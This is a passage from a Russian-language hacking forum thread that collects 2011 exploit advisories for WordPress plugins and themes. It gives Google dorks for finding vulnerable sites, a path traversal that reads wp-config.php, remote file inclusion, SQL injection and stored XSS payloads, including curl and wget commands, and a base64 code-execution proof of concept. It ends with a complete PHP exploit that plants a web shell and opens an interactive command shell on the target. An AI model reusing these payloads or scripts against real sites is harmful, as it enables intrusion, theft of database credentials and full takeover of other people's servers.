    # Software Link: http://plugins.svn.wordpress.org/filedownload/trunk/filedownload.php
    # Version: 0.1

    POC
    Код:
     /wp-content/plugins/filedownload/download.php/?path=../../../wp-config.php
    Wordpress TheCartPress Plugin 1.1.1 Remote File Inclusion


    # Exploit Title: Thecartpress Wordpress plugin RFI
    # Google Dork: inurl:wp-content/plugins/thecartpress
    # Date: 09/19/2011
    # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
    # Software Link: http://wordpress.org/extend/plugins/thecartpress/download/
    # Version: 1.1.1 (tested)

    PoC

    Код:
    http://SERVER/WP_PATH/wp-content/plugins/thecartpress/checkout/CheckoutEditor.php?tcp_save_fields=true&tcp_class_name=asdf&tcp_class_path=RFI
    Vulnerable Code

    Код:
    if ( isset( $_REQUEST['tcp_save_fields'] ) ) {
    $path = $_REQUEST['tcp_class_path'];
    $class_name = $_REQUEST['tcp_class_name'];
    require_once( $path );
    Wordpress AllWebMenus Plugin 1.1.3 Remote File Inclusion


    # Exploit Title: Allwebmenus Wordpress Menu Plugin Wordpress plugin RFI
    # Google Dork: inurl:wp-content/plugins/allwebmenus-wordpress-menu-plugin
    # Date: 09/19/2011
    # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
    # Software Link: http://wordpress.org/extend/plugins/allwebmenus-wordpress-menu-plugin/download/
    # Version: 1.1.3 (tested)

    PoC
    Код:
    http://SERVER/WP_PATH/wp-content/plugins/allwebmenus-wordpress-menu-plugin/actions.php POST="abspath=RFI"
    Vulnerable Code
    Код:
    /** Loads the WordPress Environment and Template */
    if (!isset($_POST["abspath"]))
    die();
    require_once(urldecode((string) $_POST["abspath"].'wp-blog-header.php'));
    Wordpress WPEasyStats Plugin 1.8 Remote File Inclusion


    # Exploit Title: Wpeasystats Wordpress plugin RFI
    # Google Dork: inurl:wp-content/plugins/wpeasystats
    # Date: 09/19/2011
    # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
    # Software Link: http://wordpress.org/extend/plugins/wpeasystats/download/
    # Version: 1.8

    PoC
    ---
    Код:
    http://SERVER/WP_PATH/wp-content/plugins/wpeasystats/export.php?homep=RFI
    Vulnerable Code

    Код:
    $core = $_GET['homep'].'wp-load.php';
    include( $core );
    Wordpress Annonces Plugin 1.2.0.0 Remote File Inclusion


    # Exploit Title: Annonces Wordpress plugin RFI
    # Google Dork: inurl:wp-content/plugins/annonces
    # Date: 09/19/2011
    # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
    # Software Link: http://wordpress.org/extend/plugins/annonces/download/
    # Version: 1.2.0.0 (tested)

    PoC

    Код:
    http://SERVER/WP_PATH/wp-content/plugins/annonces/includes/lib/photo/uploadPhoto.php?abspath=RFI
    Vulnerable Code

    Код:
    require_once($_GET['abspath'] . 'wp-load.php');
    Wordpress Livesig Plugin 0.4 Remote File Inclusion


    # Exploit Title: Livesig Wordpress plugin RFI
    # Google Dork: inurl:wp-content/plugins/livesig
    # Date: 09/19/2011
    # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
    # Software Link: http://wordpress.org/extend/plugins/livesig/download/
    # Version: 0.4 (tested)

    PoC

    Код:
    http://SERVER/WP_PATH/wp-content/plugins/livesig/livesig-ajax-backend.php POST="wp-root=RFI&action=asdf"
    Vulnerable Code

    Код:
    // Exit if no function specified
    if( !isset( $_POST['action'] ) || '' == $_POST['action'] ) {
    echo '{ errcode: "ERR-000", errmsg: "No action specified" }';
    exit();
    }
    
    include( $_POST['wp-root'] . 'wp-config.php' );

    Wordpress Disclosure Policy Plugin 1.0 Remote File Inclusion


    # Exploit Title: Disclosure Policy Plugin Wordpress plugin RFI
    # Google Dork: inurl:wp-content/plugins/disclosure-policy-plugin
    # Date: 09/19/2011
    # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
    # Software Link: http://wordpress.org/extend/plugins/disclosure-policy-plugin/download/
    # Version: 1.0 (tested)

    PoC

    Код:
    http://SERVER/WP_PATH/wp-content/plugins/disclosure-policy-plugin/functions/action.php?delete=asdf&blogUrl=asdf&abspath=RFI
    Vulnerable Code

    Код:
    if(isset($_GET['delete']))
    {
    global $wpdb, $wp_rewrite, $allowedtags, $user_ID;
    $table_prefix1 = "dpp_";
    
    $tags_ID = (int) $_GET['id'];
    $abspath = $_GET['abspath'];
    $blogUrl = $_GET['blog_url'];
    require_once($abspath . '/wp-config.php')
    Wordpress Mailing List Plugin 1.3.2 Remote File Inclusion


    # Exploit Title: Mailing List Wordpress plugin RFI
    # Google Dork: inurl:wp-content/plugins/mailz
    # Date: 09/19/2011
    # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
    # Software Link: http://wordpress.org/extend/plugins/mailz/download/
    # Version: 1.3.2 (tested)

    PoC

    Код:
    http://SERVER/WP_PATH/wp-content/plugins/mailz/lists/config/config.php?wpabspath=RFI
    Код:
    Vulnerable Code
    Код:
    if ( isset($_GET['wpabspath']) ) {
    //zingiri
    //error_reporting(E_ALL & ~E_NOTICE);
    //ini_set('display_errors', '1');
    define('ABSPATH', dirname(__FILE__) . '/');
    require($_GET['wpabspath'].'wp-config.php');
    
    Wordpress Zingiri Web Shop Plugin 2.2.0 Remote File Inclusion


    # Exploit Title: Zingiri Web Shop Wordpress plugin RFI
    # Google Dork: inurl:wp-content/plugins/zingiri-web-shop
    # Date: 09/19/2011
    # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
    # Software Link: http://wordpress.org/extend/plugins/zingiri-web-shop/download/
    # Version: 2.2.0 (tested)

    PoC

    Код:
    http://SERVER/WP_PATH/wp-content/plugins/zingiri-web-shop/fws/ajax/init.inc.php?wpabspath=RFI OR /fwkfor/ajax/init.inc.php?wpabspath=RFI
    Vulnerable Code

    Код:
    if ($_REQUEST['cms']=='jl') {
    define('ZING_CMS','jl');
    $_REQUEST['tmpl'] = 'component';
    $_REQUEST['option'] = 'com_zingiriwebshop';
    ob_start();
    require($_REQUEST['wpabspath'].'/index.php');
    ob_end_clean();
    } elseif ($_REQUEST['cms']=='dp') {
    //all bootstrapping is already done
    } else {
    if (!defined('ZING_AJAX') || !ZING_AJAX) {
    /** Loads the WordPress Environment */
    //require($_REQUEST['wpabspath'].'wp-blog-header.php');
    require($_REQUEST['wpabspath'].'wp-load.php');
    /** Load Zingiri Web Shop */
    require(dirname(__FILE__).'/../../zing.readcookie.inc.php');
    require(dirname(__FILE__).'/../../startmodules.inc.php');
    }
    }
    Wordpress Mini Mail Dashboard Widget Plugin 1.36 Remote File Inclusion


    # Exploit Title: Mini Mail Dashboard Widget Wordpress plugin RFI
    # Google Dork: inurl:wp-content/plugins/mini-mail-dashboard-widget
    # Date: 09/19/2011
    # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
    # Software Link: http://wordpress.org/extend/plugins/mini-mail-dashboard-widget/download/
    # Version: 1.36 (tested)

    PoC

    Код:
    http://SERVER/WP_PATH/wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=RFI (requires POSTing a file with ID wpmm-upload for this to work)
    Vulnerable Code

    Код:
    if (isset($_FILES['wpmm-upload'])) {
    // Create WordPress environmnt
    require_once(urldecode($_REQUEST['abspath']) . 'wp-load.php');
    
    // Handle attachment
    WPMiniMail::wpmm_upload();
    }
    Wordpress Relocate Upload Plugin 0.14 Remote File Inclusion

    # Exploit Title: Relocate Upload Wordpress plugin RFI
    # Google Dork: inurl:wp-content/plugins/relocate-upload
    # Date: 09/19/2011
    # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
    # Software Link: http://wordpress.org/extend/plugins/relocate-upload/download/
    # Version: 0.14 (tested)

    PoC

    Код:
    http://SERVER/WP_PATH/wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=RFI
    Vulnerable Code

    Код:
    // Move folder request handled when called by GET AJAX
    if (isset($_GET['ru_folder']))
    { // WP setup and function access
    define('WP_USE_THEMES', false);
    require_once(urldecode($_GET['abspath']).'/wp-load.php'); // save us looking for it, it's passed as a GET parameter
    (с) bugsearch​
     
    20 сен 2011
  10. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    WordPress CevherShare Plugin 2.0 SQL Injection


    • => WordPress CevherShare 2.0 plugin SQL Injection Vulnerability
    • => Bugfounder: bd0rk
    • => Contact: bd0rk[at]hackermail.com
    • => Greetings: Perle, Martin K., Carsten R., x0r_32
    • => Affected-Software: WordPress CevherShare 2.0 plugin
    • => Vendor: http://phpkode.com/
    • => Download: http://phpkode.com/download/s/cevhershare.zip
    • => Tested on: Ubuntu-Linux

    Vulnerable C0de in cevhershare/cevhershare-admin.php

    +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

    PoC: http://[someone]/wp-content/plugins/cevhershare/cevhershare-admin.php?id=[SQL-Injection]


    Код:
    $id = $_GET['id'] ? $_GET['id'] : $_POST['id'];
        $pos = $_GET['pos'] ? $_GET['pos'] : $_POST['pos'];
        $status = $_GET['status'] ? $_GET['status'] : $_POST['status'];
        $task = $_GET['t'] ? $_GET['t'] : $_POST['t'];
        $do = $_POST['do'];
        if($do == "update-lang"){
            $uplang = $_POST['update-lang'];
            update_option('cevhershare_language',$uplang);
        }
        if($id) $item = $wpdb->get_row("SELECT * FROM ".$wpdb->prefix."cevhershare WHERE id=$id");
        if($do == 'update') $wpdb->query("UPDATE ".$wpdb->prefix."cevhershare SET enabled='".$_POST['enabled']."', position='".$_POST['position']."', name='".$_POST['name']."', big='".$_POST['big']."', small='".$_POST['small']."' WHERE id='$id'");
        elseif($do == 'add') $wpdb->query("INSERT INTO ".$wpdb->prefix."cevhershare (position, name, big, small) VALUES('".$_POST['position']."','".$_POST['name']."', '".$_POST['big']."', '".$_POST['small']."')");
        elseif($do == 'delete') $wpdb->query("DELETE FROM ".$wpdb->prefix."cevhershare WHERE id=$id LIMIT 1");
        elseif($do == 'reset') cevhershare_reset();
        elseif($do == 'settings'){
    источник exploit-db.com​
    [+] оффтоп
    напутал:-[
    [свернуть]
     
    Последнее редактирование: 26 сен 2011
    26 сен 2011
    1 человеку нравится это.
  11. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    WordPress WP Bannerize plugin <= 2.8.7 SQL Injection Vulnerability

    # Exploit Title: WordPress WP Bannerize plugin <= 2.8.7 SQL Injection Vulnerability
    # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
    # Software Link: http://downloads.wordpress.org/plugin/wp-bannerize.zip
    # Version: 2.8.7 (tested)


    PoC (POST data)

    Код:
    http://www.site.com/wp-content/plugins/wp-bannerize/ajax_sorter.php
    limit=1&offset=1&item[]=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)
    Код:
    curl --data "limit=1&offset=1&item[]=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)" -H "X-Requested-With:XMLHttpRequest" http://www.site.com/wp-content/plugins/wp-bannerize/ajax_sorter.php
    Vulnerable code

    Код:
    if ( @isset($_SERVER['HTTP_X_REQUESTED_WITH']) ) {
    ...
    $limit = intval($_POST['limit']);
    $page_offset = (intval($_POST['offset']) - 1) * $limit;
    
    foreach($_POST["item"] as $key => $value){
    $sql = sprintf("UPDATE `%s` SET `sorter` = %s WHERE id = %s", $wpdb->prefix ."bannerize_b", (intval($key)+$page_offset ), $value );
    $result = mysql_query($sql);
    }
    }
     
    2 окт 2011
    1 человеку нравится это.
  12. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    Exploit Title: WordPress GD Star Rating plugin <= 1.9.10 SQL Injection Vulnerability


    PoC

    Код:
    http://www.site.com/wp-content/plugins/gd-star-rating/export.php?ex=user&us=dummy&de=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20
    Vulnerable code

    Код:
    ./export.php
        require_once("./code/cls/export.php");
        ...
        if (isset($_GET["ex"])) {
            $export_type = $_GET["ex"];
            ...
            switch($export_type) {
                case "user":
                    header('Content-type: text/csv');
                    header('Content-Disposition: attachment; filename="gdsr_export_'.$export_name.'.csv"');
                    $sql = GDSRExport::export_users($_GET["us"], $_GET["de"], $get_data);
                    $rows = $wpdb->get_results($sql, ARRAY_N);
     
    ./code/cls/export.php
        class GDSRExport {
            ...
            function export_users($user_data = "min", $data_export = "article", $get_data = array()) {
                ...
                $where = array();
                ...
                $where[] = "v.vote_type = '".$data_export."'";
                ...
                $j_where = join(" and ", $where);
                ...
                return sprintf("select %s from %s where %s order by u.id",
                        $j_select, $j_tables, $j_where);
     
    13 окт 2011
    2 пользователям это понравилось.
  13. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    WordPress Contact Form plugin <= 2.7.5 SQL Injection


    # Exploit Title: WordPress Contact Form plugin <= 2.7.5 SQL Injection Vulnerability
    # Date: 2011-10-13
    # Author: Skraps (jackie.craig.sparks(at)live.com jackie.craig.sparks(at)gmail.com @skraps_foo)
    # Software Link: http://downloads.wordpress.org/plugin/contact-form-wordpress.zip
    # Version: 2.7.5 (tested)


    PoC (POST data)

    Код:
    http://www.site.com/wp-content/plugins/contact-form-wordpress/easy-form.class.php 
    wpcf_easyform_submitted=1&wpcf_easyform_test1=testing&wpcf_easyform_formid=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)
    e.g.
    Код:
    curl --data "wpcf_easyform_submitted=1&wpcf_easyform_test1=testing&wpcf_easyform_formid=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)" -H "X-Requested-With:XMLHttpRequest" http://127.0.0.1/wordpress/?p=1

    Vulnerable code

    Line 49:
    Код:
    public function the_content($content) {
    global $wpdb;
    global $table_name;
    global $settings_table_name;
    
    $private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy';
    
    if ($_POST['wpcf_easyform_submitted'] == 1) {
    
    $form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$_POST['wpcf_easyform_formid']);

    Patch

    Код:
    *** ./easy-form.class.php.orig	2011-10-13 19:53:05.674800956 -0400
    --- ./easy-form.class.php	2011-10-13 19:51:21.442799615 -0400
    ***************
    *** 54,61 ****
    $private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy';
    
    if ($_POST['wpcf_easyform_submitted'] == 1) {
    ! 
    ! $form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$_POST['wpcf_easyform_formid']);
    
    $continue = true;
    
    --- 54,63 ----
    $private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy';
    
    if ($_POST['wpcf_easyform_submitted'] == 1) {
    ! $wpcf_easyform_formid=$_POST['wpcf_easyform_formid'];
    ! $wpcf_easyform_formid=substr($wpcf_easyform_formid,2); 
    ! 
    ! $form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$wpcf_easyform_formid);
    
    $continue = true;
    
    ***************
    *** 71,80 ****
    if ($continue) {
    
    //loop through the fields of this form (read from DB) and build the message here
    ! $form_fields = $wpdb->get_results("
    SELECT *
    FROM $settings_table_name
    ! WHERE form_id = ".$_POST['wpcf_easyform_formid']."
    ORDER BY position
    ");
    
    --- 73,82 ----
    if ($continue) {
    
    //loop through the fields of this form (read from DB) and build the message here
    ! $form_fields = $wpdb->get_results("
    SELECT *
    FROM $settings_table_name
    ! WHERE form_id = ".$wpcf_easyform_formid."
    ORDER BY position
    ");[
     
    Последнее редактирование: 15 окт 2011
    15 окт 2011
    1 человеку нравится это.
  14. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    WP Photo Album Plus <= 4.1.1 SQL Injection Vulnerability


    # Exploit Title: WP Photo Album Plus <= 4.1.1 SQL Injection Vulnerability
    # Date: 2011-10-14
    # Author: Skraps (jackie.craig.sparks(at)live.com jackie.craig.sparks(at)gmail.com @skraps_foo)
    # Plugin Page: http://wordpress.org/extend/plugins/wp-photo-album-plus/
    # Software Link: http://downloads.wordpress.org/plugin/wp-photo-album-plus.zip
    # Version: 4.1.1 (tested)

    PoC (GET data)

    Код:
    http://127.0.0.1/wordpress/?page_id=7&wppa-album=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)&wppa-cover=0&wppa-occur=1
    wppa-album=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)&wppa-cover=0&wppa-occur=1 
    e.g.

    Код:
    wget "http://127.0.0.1/wordpress/?page_id=7&wppa-album=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)&wppa-cover=0&wppa-occur=1"
    Vulnerable code

    Код:
    Line 76 of wppa-functions.php:
    if ( $this_occur ) $alb = wppa_get_get('album');
    if ( ! $alb && is_numeric($wppa['start_album']) ) $alb = $wppa['start_album'];
    
    $separate = wppa_is_separate($alb);
    
    $slide = ( wppa_get_album_title_linktype($alb) == 'slide' ) ? '&wppa-slide' : '';
    
    
    Line 3170 of wppa-functions.php:
    function wppa_get_get($index, $default = false) {
    #xdebug_start_trace('/var/www/xdebug.log');
    if (isset($_GET['wppa-'.$index])) { // New syntax first
    return $_GET['wppa-'.$index];
    }
    if (isset($_GET[$index])) { // Old syntax
    return $_GET[$index];
    }
    return $default;
    }
    
    Line 3362 of wppa-functions.php:
    function wppa_get_album_title_linktype($alb) {
    global $wpdb;
    if ( $alb ) $result = $wpdb->get_var("SELECT cover_linktype FROM ".WPPA_ALBUMS." WHERE id = ".$alb." LIMIT 1");
    else $result = '';
    echo $result;
    return $result;
    }
    Patch

    Код:
    *** ./wppa-functions.php	2011-10-03 09:37:48.000000000 -0400
    --- ./wppa-functions.php.new	2011-10-15 16:02:27.996945496 -0400
    ***************
    *** 3361,3367 ****
    
    function wppa_get_album_title_linktype($alb) {
    global $wpdb;
    ! 
    if ( $alb ) $result = $wpdb->get_var("SELECT cover_linktype FROM ".WPPA_ALBUMS." WHERE id = ".$alb." LIMIT 1");
    else $result = '';
    //echo $result;
    --- 3361,3367 ----
    
    function wppa_get_album_title_linktype($alb) {
    global $wpdb;
    ! $alb=intval($alb);
    if ( $alb ) $result = $wpdb->get_var("SELECT cover_linktype FROM ".WPPA_ALBUMS." WHERE id = ".$alb." LIMIT 1");
    else $result = '';
    //echo $result;
    ***************
    *** 3384,3387 ****
    global $wppa;
    
    if ( $wppa['any'] ) echo $wppa['searchresults'];
    ! }
    \ No newline at end of file
    --- 3384,3387 ----
    global $wppa;
    
    if ( $wppa['any'] ) echo $wppa['searchresults'];
    ! }

    WordPress BackWPUp Plugin 2.1.4 Code Execution


    Proof of Concept.

    Код:
    Upload the following to a publicly accessible FTP server and
    name it "file.txt.running".
    
    a:2:{s:7:"WORKING";a:1:{s:5:"NONCE";s:3:"123";}s:8:"ABS_PATH";s:25:
    "data://text/plain;base64,PD8gcGhwaW5mbygpOyBkaWUoKTs=";}
    
    This serialised string creates an array containing:
    
    $infile['WORKING'] = array();
    $infile['WORKING']['NONCE'] = '123';
    $infile['ABS_PATH'] = 
    'data://text/plain;base64,PD8gcGhwaW5mbygpOyBkaWUoKTs=';
    
    Once uploaded ensure the FTP file is writeable and issue a POST to
    "job/wp_export_generate.php" with the following parameters:
    
    $_POST['BackWPupJobTemp'] = "ftp://user:password@10.2.0.128/file.txt";
    $_POST['nonce'] = '123';
    $_POST['type'] = 'getxmlexport';
    
    The string included in $infile['ABS_PATH'] will then have "wp-load.php"
    appended to it and passed to require_once.
    
    In the above example the code contained in the base64 encoded string will
    then be executed. The above code executes .phpinfo(); die();..
    allow_URL_include will need to be on to allow to allow for remote file
    inclusion, however local file inclusion could easily be achieved by using
    null byte injection.
    
    Solution.
    =========
    Upgrade to BackWPUp 2.1.5 of above.
    
    Discovered by.
    Phil Taylor from Sense of Security Labs.
    
    About us.
    Sense of Security is a leading provider of information security and risk
    management solutions. Our team has expert skills in assessment and 
    assurance,
    strategy and architecture, and deployment through to ongoing management.
    We are Australia's premier application penetration testing firm and trusted
    IT security advisor to many of the country.s largest organisations.
    
    Sense of Security Pty Ltd
    Level 8, 66 King St
    Sydney NSW 2000
    AUSTRALIA
    
    T: +61 (0)2 9290 4444
    F: +61 (0)2 9290 4455
    W: http://www.senseofsecurity.com.au
    E: info@senseofsecurity.com.au
    Twitter: @ITsecurityAU
    
    The latest version of this advisory can be found at:
    http://www.senseofsecurity.com.au/advisories/SOS-11-012.pdf
    
    Other Sense of Security advisories can be found at:
    http://www.senseofsecurity.com.au/research/it-security-advisories.php 
     
    18 окт 2011
  15. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    WordPress wptouch plugin SQL Injection Vulnerability

    • # Exploit Title: WordPress wptouch plugin SQL Injection Vulnerability
    • # Date: 2011-27-10
    • # Author: longrifle0x
    • # software: Wordpress
    • # Tools: SQLMAP

    (POST data)

    Код:
    http://www.site.com/wp-content/plugins/wptouch/ajax.php
    
    #Exploit: id=-1; id=- AND SLEEP(5) or 1=if
    
    http://site.com/wp-content/plugins/wptouch/ajax.php][GET][id=-1][CURRENT_USER()
    
    http://site.com/wp-content/plugins/wptouch/ajax.php][GET][id=-1][SELECT
    (CASE WHEN ((SELECT super_priv FROMmysql.user WHERE user='None' LIMIT
    0,1)='Y') THEN 1 ELSE 0 END)
    
    http://site.com/wp-content/plugins/wptouch/ajax.php][GET][id=-1][MID((VERSION()),1,6)
    (c) bugsearch
     
    30 окт 2011
  16. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    WordPress Classipress Theme <= 3.1.4 Stored XSS

    # Exploit Title: WordPress Classipress Theme <= 3.1.4 Stored XSS
    # Date: 2011-09-26
    # Author: Paul Loftness
    # Contact:http://attackvectorlabs.blogspot.com
    # Vendor: Appthemes LLc.
    # Product Web Page: http://www.appthemes.com/themes/classipress/
    # Version: <=3.1.4
    # Tested Versions: 3.1.4, 3.0.5.3

    Summary:

    ClassiPress is a popular and widely used classified ads software for WordPress.

    Description:

    Classipress is vulnerable to multiple stored XSS vulnerabilities. Input through the POST parameters 'facebook_id' and 'twitter_id' in a registered user's profile page is either not sanitisized or poorly sanitised (version specific) allowing the attacker to insert Javascript code.

    In version 3.0.5.2 and presumably all previous versions, no sanitation is in place, allowing an attacker to insert code within a tag or to break out of it. In version 3.1.4, the less-than character is sanitised but an attacker can still insert quotes and place an event handler in the tag.


    Proof-of-Concept Code:

    Insertion page: http://example_site/author/profile/
    Infected page: http://example_site/author/attacker_username/
    Note: Some sites replace "author" with another path, this is not a vanilla configuration, however.

    Version: ClassiPress 3.0.5.2
    Vulnerable Input Parameters:

    Код:
    twitter_id: " onmouseover="alert('XSS');
    facebook_id: " onmouseover="alert('XSS');
    Alternate Exploit code:
    Код:
    twitter_id: "><script>alert('XSS');</script><div id="
    facebook_id: "><script>alert('XSS');</script><div id="

    Version: ClassiPress 3.1.4
    Vulnerable Input Parameters:

    Код:
    twitter_id: " onmouseover='alert("XSS");'><
    facebook_id: " onmouseover='alert("XSS");'><
    WordPress WP Glossary Plugin SQL Injection

    ######################################################
    # Exploit Title: WordPress WP Glossary plugin SQL Injection Vulnerability
    # Date: 2011-30-10
    # Author: longrifle0x
    # software: Wordpress
    # Download: http://wordpress.org/extend/plugins/wp-glossary/
    # Tools: SQLMAP
    ######################################################

    *DESCRIPTIONDiscovered a vulnerability in WP Glossary, Wordpress Plugin,
    vulnerability is SQL injection.

    File:
    Код:
    wp-content/plugins/wp-glossary/ajax.php
    Exploit: id=-1; or 1=if
    Exploitation:
    Код:
    http://localhost:80/wp-content/plugins/wp-glossary/ajax.php
    [GET][id=-1][CURRENT_USER()
    http://localhost:80/wp-content/plugins/wp-glossary/ajax.php
    [GET][id=-1][SELECT
    (CASE WHEN ((SELECT super_priv FROMmysql.user WHERE user='None' LIMIT
    0,1)='Y') THEN 1 ELSE 0 END)
    http://localhost:80/
    wp-content/plugins/wp-glossary/ajax.php [GET][id=-1][MID((VERSION()),1,6)
    Wordpress Zingiri Plugin <= 2.2.3 (ajax_save_name.php) Remote Code Execution

    PHP:
    <?php

    /*
    ------------------------------------------------------------------------
    Wordpress Zingiri Web Shop Plugin <= 2.2.3 Remote Code Execution Exploit
    ------------------------------------------------------------------------

    author...............: Egidio Romano aka EgiX
    mail.................: n0b0d13s[at]gmail[dot]com
    software link........: http://wordpress.org/extend/plugins/zingiri-web-shop/
    affected versions....: from 0.9.12 to 2.2.3

    +-------------------------------------------------------------------------+
    | This proof of concept code was written for educational purpose only. |
    | Use it at your own risk. Author will be not responsible for any damage. |
    +-------------------------------------------------------------------------+

    [-] vulnerable code in /fws/addons/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajax_save_name.php

    37. @ob_start();
    38. include_once(CLASS_SESSION_ACTION);
    39. $sessionAction = new SessionAction(); 
    40. $selectedDocuments = $sessionAction->get();
    41. if(removeTrailingSlash($sessionAction->getFolder()) == getParentPath($_POST['id']) && sizeof($selectedDocuments))
    42. {
    43. if(($key = array_search(basename($_POST['id']), $selectedDocuments)) !== false)
    44. {
    45. $selectedDocuments[$key] = $_POST['value'];
    46. $sessionAction->set($selectedDocuments);
    47. 
    48. }
    49. echo basename($_POST['id']) . "\n";
    50. displayArray($selectedDocuments);
    51. 
    52. }elseif(removeTrailingSlash($sessionAction->getFolder()) == removeTrailingSlash($_POST['id']))
    53. {
    54. $sessionAction->setFolder($_POST['id']);
    55. }
    56. writeInfo(ob_get_clean());

    An attacker could be able to manipulate the $selectedDocuments array that will be displayed at line 50,
    then at line 56 is called the 'writeInfo' function using the current buffer contents as argument.
    Like my recently discovered vulnerability (http://www.exploit-db.com/exploits/18075/), this function
    writes into a file called 'data.php' so an attacker could be able to execute arbitrary PHP code.

    [-] Note:

    The same vulnerability affects also the Joomla component (http://extensions.joomla.org/extensions/e-commerce/shopping-cart/13580)
    but isn't exploitable due to a misconfiguration in 'CONFIG_SYS_ROOT_PATH' constant definition.

    [-] Disclosure timeline:

    [23/11/2011] - Vulnerability discovered
    [25/10/2011] - Issue reported to http://forums.zingiri.com/
    [12/11/2011] - Version 2.2.4 released
    [13/11/2011] - Public disclosure

    */

    error_reporting(0);
    set_time_limit(0);
    ini_set("default_socket_timeout"5);

    $fileman "wp-content/plugins/zingiri-web-shop/fws/addons/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager";

    function 
    http_send($host$packet)
    {
    if (!(
    $sock fsockopen($host80)))
    die( 
    "\n[-] No response from {$host}:80\n");

    fwrite($sock$packet);
    return 
    stream_get_contents($sock);
    }

    function 
    get_root_dir()
    {
    global 
    $host$path$fileman;

    $packet "GET {$path}{$fileman}/ajaxfilemanager.php HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Connection: close\r\n\r\n";

    if (!
    preg_match('/currentFolderPath" value="([^"]*)"/'http_send($host$packet), $m)) die("\n[-] Root folder path not found!\n");
    return 
    $m[1];
    }

    function 
    random_mkdir()
    {
    global 
    $host$path$fileman$rootdir;

    $dirname uniqid();

    $payload "new_folder={$dirname}&currentFolderPath={$rootdir}";
    $packet "POST {$path}{$fileman}/ajax_create_folder.php HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Content-Length: ".strlen($payload)."\r\n";
    $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $packet .= "Connection: close\r\n\r\n{$payload}";

    http_send($host$packet); 
    return 
    $dirname;
    }

    print 
    "\n+----------------------------------------------------------------------------------+";
    print 
    "\n| Wordpress Zingiri Web Shop Plugin <= 2.2.3 Remote Code Execution Exploit by EgiX |";
    print 
    "\n+----------------------------------------------------------------------------------+\n";

    if (
    $argc 3)
    {
    print 
    "\nUsage......: php $argv[0] <host> <path>\n";
    print 
    "\nExample....: php $argv[0] localhost /";
    print 
    "\nExample....: php $argv[0] localhost /wordpress/\n";
    die();
    }

    $host $argv[1];
    $path $argv[2];

    $rootdir get_root_dir();
    $phpcode "<?php error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die; ?>";

    $payload "selectedDoc[]={$phpcode}&currentFolderPath={$rootdir}";
    $packet "POST {$path}{$fileman}/ajax_file_cut.php HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Content-Length: ".strlen($payload)."\r\n";
    $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $packet .= "Connection: close\r\n\r\n{$payload}";

    if (!
    preg_match("/Set-Cookie: ([^;]*);/"http_send($host$packet), $sid)) die("\n[-] Session ID not found!\n");

    $dirname random_mkdir();
    $newname uniqid();

    $payload "value={$newname}&id={$rootdir}{$dirname}";
    $packet "POST {$path}{$fileman}/ajax_save_name.php HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Cookie: {$sid[1]}\r\n";
    $packet .= "Content-Length: ".strlen($payload)."\r\n";
    $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $packet .= "Connection: close\r\n\r\n{$payload}";

    http_send($host$packet);

    $packet "GET {$path}{$fileman}/inc/data.php HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Cmd: %s\r\n";
    $packet .= "Connection: close\r\n\r\n";

    while(
    1)
    {
    print 
    "\nzingiri-shell# ";
    if ((
    $cmd trim(fgets(STDIN))) == "exit") break;
    preg_match("/_code_(.*)/s"http_send($hostsprintf($packetbase64_encode($cmd))), $m) ?
    print 
    $m[1] : die("\n[-] Exploit failed!\n");
    }

    ?>
